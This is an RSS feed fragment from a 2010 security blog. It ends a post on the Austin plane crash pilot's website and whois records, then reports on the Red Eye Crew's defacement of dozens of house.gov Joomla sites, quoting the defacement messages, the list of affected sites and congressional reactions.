<p>We do not think so. Let&#8217;s explore this a little, first looking at the whois results for the http://embeddedart.com/ web site. The person listed as the administrative contact is the same person being identified as the pilot, Joseph Stack. Further, the web site was not registered recently; it has been around for seven years. Finally, while we&#8217;ve been impressed with the complexity of Internet hoaxes in the past, it&#8217;s not easy to write a well-thought-out essay of 3,202 words in less than two hours.</p>

<pre><code>Administrative Contact:
Stack, Joe dns.5.sgmail@dfgh.net
925 E Hwy 80
287
San Marcos, TX 78666
US
1.3215649879
Technical Contact:
Stack, Joe dns.5.sgmail@dfgh.net
925 E Hwy 80
287 San Marcos, TX 78666
US
1.3215649879

Registrar of Record: TUCOWS, INC.
Record last updated on 16-Sep-2006.
Record expires on 05-Jun-2010.
Record created on 05-Jun-2003.
</code></pre>

<p>So this does appear to be what it outwardly seems: the last essay of an American suicide bomber with a serious beef against the IRS.</p>

<h3>A Software Engineer</h3>

<p>Looking at the previous form of Stack&#8217;s web site, before it hosted an anti-tax manifesto, it advertised his software contracting services:</p>

<p><div id="attachment_3368" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/02/website_1.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/02/website_1.jpg" alt="Joseph Stack Web Site" title="website_1" width="750" height="598" class="size-full wp-image-3368" /></a><p class="wp-caption-text">Joseph Stack Web Site</p></div>
<br /></p>

<h4>Company Mission</h4>

<pre><code>To advance the art of programming, one project at a time; by achieving an optimum balance between
 cost, schedule, functionality, reliability, and maintainability. 
</code></pre>

<h4>Resume</h4>

<p>Stack&#8217;s software experience (resume): <a href='http://praetorianprefect.com/wp-content/uploads/2010/02/Embedded-Art-Key-Environment-Components.pdf'>Embedded Art &#8211; Key Environment Components</a>.</p>

<h4>Software Projects</h4>

<p><div id="attachment_3369" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/02/website_projects.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/02/website_projects.jpg" alt="Listed customer projects from Joseph Stack&#039;s web site." title="website_projects" width="750" height="598" class="size-full wp-image-3369" /></a><p class="wp-caption-text">Listed customer projects from Joseph Stack's web site.</p></div>
<br /></p>

<h3>Stack&#8217;s Home Location</h3>

<p>According to his web site, his address appears to be a condominium unit:</p>

<pre><code>6001 W. Parmer Ln., #370-167
Austin, TX 78727
</code></pre>

<p><div id="attachment_3370" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/02/condo.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/02/condo-300x218.jpg" alt="Condo address listed on Stack&#039;s web site." title="condo" width="300" height="218" class="size-medium wp-image-3370" /></a><p class="wp-caption-text">Condo address listed on Stack's web site.</p></div>
<br /></p>

<p>However, this may be old, as another web site is reporting the address to be 1827 Dapplegray Lane. This makes more sense when combined with the house burning video below (there is a fence/wall in both).</p>

<p><div id="attachment_3371" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/02/dapplegray.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/02/dapplegray-300x204.jpg" alt="The address listed as Stack&#039;s on media web sites." title="dapplegray" width="300" height="204" class="size-medium wp-image-3371" /></a><p class="wp-caption-text">The address listed as Stack's on media web sites.</p></div>
<br /></p>

<p>If this is really his house, it&#8217;s a nice place for a guy with tax problems:
<div id="attachment_3384" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/02/Screen-shot-2010-02-18-at-3.49.12-PM.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/02/Screen-shot-2010-02-18-at-3.49.12-PM-300x216.png" alt="House listed on media outlets as Joseph Stack&#039;s." title="Screen shot 2010-02-18 at 3.49.12 PM" width="300" height="216" class="size-medium wp-image-3384" /></a><p class="wp-caption-text">House listed on media outlets as Joseph Stack's.</p></div>
<br /></p>

<p>Either way, this was what the house looked like this morning:</p>

<p><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/ojoWY_Fy6Bk&#038;color1=0xb1b1b1&#038;color2=0xcfcfcf&#038;hl=en_US&#038;feature=player_embedded&#038;fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowScriptAccess" value="always"></param><embed src="http://www.youtube.com/v/ojoWY_Fy6Bk&#038;color1=0xb1b1b1&#038;color2=0xcfcfcf&#038;hl=en_US&#038;feature=player_embedded&#038;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="425" height="344"></embed></object>
<br /></p>

<h3>A Wrong Reaction</h3>

<p>So, other than being a homeland security issue, why would a humble information security blog find this interesting? Well, it is always interesting to us how people handle incident response.</p>

<p>The DHS Journal reported the following via Twitter: &#8220;Small plane crash into private office bldg in Austin, TX. Cause unknown, but no known link to terrorism.&#8221;</p>

<p>White House spokesman Robert Gibbs also weighed in, saying it was not an attack.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2009/10/dhs-responds-to-us/">DHS Responds to Us</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/02/was-the-austin-plane-crash-domestic-terrorism/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Congressional Web Site Defacements Follow the State of the Union</title>
		<link>http://praetorianprefect.com/archives/2010/01/congressional-web-site-defacements-follow-the-state-of-the-union/</link>
		<comments>http://praetorianprefect.com/archives/2010/01/congressional-web-site-defacements-follow-the-state-of-the-union/#comments</comments>
		<pubDate>Thu, 28 Jan 2010 09:46:14 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Web Site Defacement]]></category>
		<category><![CDATA[congress]]></category>
		<category><![CDATA[redeye]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3236</guid>
		<description><![CDATA[Shortly after President Obama's State of the Union address, constituents visiting the web sites of Congressional representatives like Charles Gonzalez (20th District of Texas), Spencer Bachus (Alabama's 8th District), and Brian Baird (Washington's 3rd District) were presented with a defacement message from the Red Eye Crew that as of 4:10 am EST remains up on their web sites. All of the sites affected are in the house.gov domain, but not every congressional site in the domain is defaced.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/01/US-Capitol.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/01/US-Capitol-150x150.jpg" alt="" title="US Capitol" width="75" height="75" class="alignleft size-thumbnail wp-image-3243" /></a></p>

<p>Shortly after President Obama&#8217;s State of the Union address, constituents visiting the web sites of Congressional representatives like Charles Gonzalez (20th District of Texas), Spencer Bachus (Alabama&#8217;s 8th District), and Brian Baird (Washington&#8217;s 3rd District) were presented with a defacement message from the Red Eye Crew that as of 4:10 am EST remains up on their web sites. All of the sites affected are in the house.gov domain, but not every congressional site in the domain is defaced.</p>

<h3>The Defacement</h3>

<p>The sites were defaced to simply show the following line of text:</p>

<pre><code>FUCK OBAMA!! Red Eye CREW !!!!! O RESTO E HACKER !!! by m4V3RiCk ; HADES ; T4ph0d4 -- FROM BRASIL
</code></pre>

<p><div id="attachment_3258" class="wp-caption alignleft" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/01/hacked.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/01/hacked.png" alt="Official web site for Representative John Barrow (D - GA)." title="hacked" width="750" height="398" class="size-full wp-image-3258" /></a><p class="wp-caption-text">Official web site for Representative John Barrow (D - GA).</p></div>
<br /></p>

<p>O RESTO E HACKER is Portuguese, roughly &#8220;The rest are hackers&#8221;.</p>

<h3>Affected Sites</h3>

<p>Here is a list of Congressional members&#8217; web sites that we noted were affected last night. The full list of 49 web sites, attached below as Appendix A, was released on the 28th.</p>

<pre><code>http://www.joewilson.house.gov/
http://bachus.house.gov/
http://www.baird.house.gov/
http://www.barrow.house.gov/
http://www.gonzalez.house.gov/
http://mcnerney.house.gov/
http://mikepence.house.gov/
http://driehaus.house.gov/
http://carson.house.gov/
http://campbell.house.gov/
http://doggett.house.gov/
http://coffman.house.gov/
http://www.kosmas.house.gov/
http://hersethsandlin.house.gov/
http://lujan.house.gov/
http://www.mccollum.house.gov/
http://teague.house.gov/
http://mitchell.house.gov/
http://www.roe.house.gov/
http://www.lofgren.house.gov/
http://carnahan.house.gov/
http://www.chrismurphy.house.gov/
http://hunter.house.gov/
http://olver.house.gov/
http://arcuri.house.gov/
http://tierney.house.gov/
</code></pre>

<p>A few committee sites were affected as well:</p>

<pre><code>http://republicans.financialservices.house.gov/
http://republicans.oversight.house.gov/
http://gop.cha.house.gov/
</code></pre>

<h3>Defaced Sites Normal Appearance</h3>

<p>Here are a few examples of what the now defaced sites normally look like:</p>

<p><div id="attachment_3245" class="wp-caption alignleft" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/01/bachus.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/01/bachus-300x191.png" alt="The Spencer Bachus site on better days." title="bachus" width="300" height="191" class="size-medium wp-image-3245" /></a><p class="wp-caption-text">The Spencer Bachus site on better days.</p></div>
<br /></p>

<p><div id="attachment_3246" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/01/gonzalez.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/01/gonzalez-300x191.png" alt="The Charles Gonzalez site on better days." title="gonzalez" width="300" height="191" class="size-medium wp-image-3246" /></a><p class="wp-caption-text">The Charles Gonzalez site on better days.</p></div>
<br /></p>

<h3>The RedEye Crew</h3>

<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/01/redeye.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/01/redeye.png" alt="redeye" title="redeye" width="150" height="151" class="alignleft size-full wp-image-3254" /></a>
The Red Eye Crew has been around for a while and has thousands of web site defacements to its credit. One member, handle HADES, defaced 453 government sites in Brazil last August through a reported SQL injection. A quick review of the defacements captured at Zone-H <a href="http://www.zone-h.org/archive/notifier=Red%20Eye">shows 45,735 defacements</a>, primarily mass defacements. At one point they were doing tongue-in-cheek dedications to the memory of <a href="http://en.wikipedia.org/wiki/Elizabeth_B%C3%A1thory">Elizabeth Bathory</a>, a prolific female serial killer from the Middle Ages.</p>

<p>Last August, they defaced the web site of Old Dominion University with a message in Portuguese, supporting their being a Brazilian team. The team has also defaced a number of Brazilian web sites. These two points sit alongside the fact that they come right out and say that they&#8217;re from Brazil.</p>

<h3>Not the First Time Around</h3>

<blockquote>
  <p>&#8220;those were default passwords, meant to be changed by the Representatives&#8217; offices.&#8221; <br />GovTrends</p>
</blockquote>

<p>As one of our readers astutely pointed out, these sites are managed by a third party provider called <a href="http://switch2govtrends.com/">GovTrends</a>, a Virginia web development company with the somewhat ironic phrase <i>&#8220;You get what you pay for&#8221;</i> on their web site. Last August at least 18 congressional member sites managed by the same vendor were defaced by Indonesian cracker <a href="http://www.zone-h.com/archive/notifier=3n_byt3">3n_byt3 (1164 defacements to his credit)</a>, a result, according to GovTrends, of a login to the administrative portion of the sites with a default password, in an apparent attempt to deflect blame for the attack back to House staffers.</p>

<p>This explanation actually makes little sense, because the defacer added a news item to each page stating: <i>H4ck3d by 3n_byt3 @ Indonesia H4ck3rs</i>. If he had had full administrative access to the CMS platform, the defacement would have been a full-page defacement, not an injection into a news item on the site. The problem was much more likely an SQL injection, potentially the <a href="http://securityreason.com/exploitalert/7501">Joomla Component News SQL Injection vulnerability</a>.</p>

<p><div id="attachment_3266" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/01/3n_byt3.JPG"><img src="http://praetorianprefect.com/wp-content/uploads/2010/01/3n_byt3.JPG" alt="Senator Edwards site defacement from last August." title="3n_byt3" width="750" height="321" class="size-full wp-image-3266" /></a><p class="wp-caption-text">Senator Edwards site defacement from last August.</p></div>
<br /></p>

<h3>And Then It Got Awkward</h3>

<blockquote>
  <p>&#8220;It is extremely important that my constituents can trust that information provided to my office is kept confidential and secure.&#8221; <br />Rep. Spencer Bachus</p>
</blockquote>

<p>After the attack in August, Representative Spencer Bachus sent a letter to the CAO (Chief Administrative Officer) of the House asking essentially for two things: actual details of the attack and a plan for notification of such incidents in the future, as shared with Brian Krebs.</p>

<p>You can read the full letter here: <a href='http://praetorianprefect.com/wp-content/uploads/2010/01/BachusLetter.pdf'>BachusLetter</a>.</p>

<p>In the letter he states <i>&#8220;GovTrends refused to provide copies of the logs of the intrusion&#8221;</i> and referred all questions to HIR (House Information Resources), while at the same time telling the press the default password theory. It&#8217;s completely unclear why Representative Bachus, who appeared to be the only one publicly calling for a review of the logs by someone with forensics expertise, was denied the ability to do this.</p>

<p>The risk of a breach and defacement is borne fully by him, as the web site is in his name, and thus the request for a proper investigation by a computer forensics expert was the correct instinct in this scenario. Without a proper review of the attack in August, followed by a web application vulnerability assessment, there was little hope of preventing future defacements such as the one today.</p>

<h3>So How Did They Get In?</h3>

<blockquote>
  <p>&#8220;Over the last year the House has continued aggressively fortifying its security systems.&#8221;<br />Jeff Ventura, CAO spokesman, August 7th, 2009</p>
</blockquote>

<p>Unfortunately, we won&#8217;t know that until someone who manages house.gov provides some details. Server access seems unlikely, because while the sites we checked are hosted on dcserver1.house.gov, not every site hosted on that server is defaced (for example, Congressman Joe Sestak&#8217;s web site was fine). The sites are not redirecting anywhere.</p>

<p>Congress members seem to be able to use different content management systems for updating their web sites. For example, Michelle Bachmann&#8217;s site uses a tool called <a href="http://www.fireside21.com">Fireside</a>, a content management system targeted at members of Congress. That site returns firesideweb.house.gov as the server, whereas the defaced sites we checked return dcserver1.house.gov. All of the defaced sites we saw have one thing in common: they run on the <a href="http://www.joomla.org/">Joomla content management system</a>.</p>

<p>But not all of the Joomla CMS web sites are affected. For example, a comment tag indicates that the sites http://ellison.house.gov and http://kirkpatrick.house.gov use Joomla, but they were not defaced. This might indicate that a Joomla component is to blame; however, that is just speculation.</p>

<p>Joomla has had its share of security vulnerabilities in the past (as <a href="http://osvdb.org/vendor/4358-joomla/1">shown in the OSVDB</a>). Don&#8217;t waste time discussing historical vulnerabilities in Joomla or its extensions, however: as with all popular, complex web content platforms, configuration by the web site operators is important, and it is their responsibility to ensure a patched installation with a secure configuration (like no default passwords). Only when an installation is fully updated and a zero-day or improperly reported vulnerability is introduced through a careless mistake can the platform come into serious question.</p>

<p>Regardless, only the person who has access to the server the sites are running on and performs the forensic analysis will be able to tell exactly what happened. Hopefully they will release some sort of statement.</p>

<h3 id="updates">Updates &#8211; 1/28/09</h3>

<p>Representatives John Boehner and Nancy Pelosi want to know what happened, as detailed in a letter sent to the House CAO today:</p>

<pre><code>January 28, 2010

The Honorable Daniel P. Beard
Chief Administrative Officer
U.S. House of Representatives
Washington, DC 20515

Dear Mr. Beard:

We request that you initiate an immediate and comprehensive assessment of how hackers were able to 
deface the websites of nearly fifty House Members and Committees last night.

In the past, we jointly requested that your office review and tighten cybersecurity protections designed 
to ensure that congressional offices and committees are safeguarded from unauthorized intrusions. We 
appreciate the efforts you and your cybersecurity team have taken to tighten firewalls, as well as more 
recent efforts to ensure that official mobile communications devices are secure from hacking and other 
intrusions.

However, last night's actions indicate that further review of security procedures are needed. From initial 
reports, these intrusions appear to be related to one website vendor which has had previous security 
failures. While many Members have expressed satisfaction with the vendor in question, this is the second 
time in a year websites hosted and supported by this vendor have been compromised. We therefore request 
that your office work with the Committee on House Administration to review the security standards for House 
vendors and to assess whether this vendor, and others, have adhered to those standards. We also request 
that you take immediate action to protect against breaches of the House firewalls and to ensure website 
security of all House offices.

Thank you for your attention to this matter.

Sincerely,


NANCY PELOSI                      JOHN BOEHNER
Speaker                               Republican Leader

Cc: The Honorable Robert A. Brady
Chairman, Committee on House Administration

The Honorable Dan Lungren
Ranking Member, Committee on House Administration
</code></pre>

<p>SOURCE <a href="http://www.speaker.gov/newsroom/pressreleases?id=1523">Office of the Speaker of the House</a></p>

<hr />

<p>Some outlets are reporting that this was &#8220;an attack on the sites of Democrats&#8221;. Note that one of the first sites we saw defaced was that of Republican Congressman Joe Wilson from South Carolina. &#8220;You lie!&#8221; Nope, it&#8217;s true.</p>

<hr />

<p>SC Magazine <a href="http://www.scmagazineus.com/hackers-deface-49-us-house-websites/article/162576/">got a reaction</a> from Jeff Ventura, spokesman for the Office of the Chief Administrative Officer (CAO) in the U.S. House: <i>“None of the sites we host and manage internally at the House are impacted, it was through no action of ours that this breach occurred.”</i></p>

<p>The server appears to be the same as for many of the other representatives&#8217; sites, so a full abdication of responsibility to the vendor, especially at this early stage without a statement from a qualified computer forensics resource, would seem to be inappropriate. Further, the question for the CAO as well as the affected members of Congress is why they stuck with the same vendor after the August breach and the subsequent refusal to provide a detailed analysis or logs that could be reviewed by a computer security expert. Finally, the organization with the overall responsibility for information technology must regularly vet the vendors it uses.</p>

<hr />

<p>Then the Associated Press reported this:</p>

<p><i>Ventura says the vendor was performing an update and for a brief moment let its guard down. That was long enough to allow the hacker to penetrate the sites.</i></p>

<p>Without further information this makes little sense. It is a classic response to elevate the cracker by saying that they caught you in a moment of &#8216;letting your guard down&#8217;; further, the &#8220;we were upgrading systems&#8221; response is always thought better than the &#8220;a vulnerability was out there for x amount of time&#8221; response. What maintenance allowed a cracker to get in, and how did they happen to reach you in that short window? It does happen sometimes, but it&#8217;s unusual and usually still based on an IT error, even for sites that are under constant external probing by bad actors.</p>

<p>Further evidence would have to be provided for this to be an acceptably plausible theory of what happened, especially in light of the scant details and somewhat problematic explanation of the August attack.</p>

<hr />

<p>Ventura stated <a href="http://www.politico.com/news/stories/0110/32145.html">to Politico</a>:</p>

<p><i>&#8220;I think what you’re going to see going forward is an insistence to the adherence of policy, as opposed to just the suggestion that the policy standard has to be a certain level.”</i></p>

<p>This is actually somewhat similar to what was stated the last time around. If I&#8217;m a member of Congress whose reputation is being affected, at this point I&#8217;m calling for a computer forensics team from a reputable company to come in for an evaluation and tell me a reasonable theory of how this breach happened. Then I&#8217;m releasing a statement, identifying the expert firm I called in to do the evaluation, so that people understand that a serious investigation took place. Further, I&#8217;m getting a web vulnerability assessment done on the house.gov web properties. These two actions don&#8217;t offer any guarantee of perfect forward security, but they make a big difference.</p>

<p>At the same time, GovTrends is being painted as stonewalling: <i>&#8220;GovTrends employees did not return multiple phone or email messages seeking comment.&#8221;</i> And Ventura states, “We’re discussing our options.”</p>

<hr />

<p>RedEye also defaced three Brazilian government web sites last night (addresses below) with the following message:</p>

<pre><code>Red Eye Crew! Owned by HADES &amp;&amp; m4V3R1ck
</code></pre>

<pre><code>www.cedasc.ba.gov.br
www.cti.gov.br
itapiranga.cti.gov.br
</code></pre>

<hr />

<p>Finally, in a completely unrelated but somewhat coincidental piece of circumstance, Joomla.org, the project homepage of the Joomla CMS used by the Congressional sites, was itself defaced by the same Red Eye Crew back in August of 2008.</p>

<pre><code>H A C K E D !

joomla.org owned!


Red Eye CREW

owned joomla.org =)

m4V3RiCk - W4n73d - _dDoS_

by m4v3rick

"That´s all Folks!!"
</code></pre>

<h3>Appendix A &#8211; Full list of Affected Sites</h3>

<pre><code>altmire.house.gov
arcuri.house.gov
bachus.house.gov
baird.house.gov
barrow.house.gov
bilirakis.house.gov
boccieri.house.gov
bright.house.gov
campbell.house.gov
carnahan.house.gov
carson.house.gov
charliewilson.house.gov
childers.house.gov
coffman.house.gov
dahlkemper.house.gov
davis.house.gov
doggett.house.gov
driehaus.house.gov
energycommerce.house.gov
gonzalez.house.gov
gop.cha.house.gov
hersethsandlin.house.gov
honda.house.gov
hunter.house.gov
joewilson.house.gov
kirk.house.gov
kosmas.house.gov
larson.house.gov
lipinski.house.gov
lofgren.house.gov
lujan.house.gov
mccollum.house.gov
mcnerney.house.gov
mikepence.house.gov
mitchell.house.gov
mollohan.house.gov
murphy.house.gov
murtha.house.gov
olver.house.gov
quigley.house.gov
republicans.financialservices.house.gov
republicans.oversight.house.gov
resourcescommittee.house.gov
roe.house.gov
schakowsky.house.gov
shea-porter.house.gov
teague.house.gov
tierney.house.gov
welch.house.gov 
</code></pre>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/newsweek-reports-zombie-invasion/">Newsweek Reports Zombie Invasion</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/going-after-bp/">Going After BP</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/umm-techcrunch-defacement-two-in-24-hours/">Umm&#8230;TechCrunch? Defacement Two in 24 Hours</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/techcrunched-techcrunch-the-victim-of-a-defacement/">TechCrunched &#8211; TechCrunch the Victim of a Defacement</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/baidu-com-the-latest-victim-of-iranian-cyberarmy/">Baidu.com the Latest Victim of Iranian CyberArmy</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/01/congressional-web-site-defacements-follow-the-state-of-the-union/feed/</wfw:commentRss>
		<slash:comments>29</slash:comments>
		</item>
	</channel>
</rss>
